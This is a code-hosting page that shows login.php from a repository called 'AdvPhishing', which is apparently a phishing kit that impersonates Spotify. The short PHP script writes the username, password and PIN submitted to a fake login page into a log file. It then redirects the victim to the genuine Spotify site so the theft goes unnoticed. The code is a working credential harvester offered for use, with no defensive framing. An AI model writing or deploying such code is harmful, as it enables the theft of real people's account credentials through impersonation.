Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
Ignitetch
GitHub Repository: Ignitetch/AdvPhishing
Path: blob/master/sites/spotify/login.php
1508 views
1
<?php
2
3
file_put_contents("log.txt", "Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . " PIN: " . $_POST['pin'] . "\n", FILE_APPEND);
4
header('Location: https://www.spotify.com/in');
5
exit();
6
7
8
9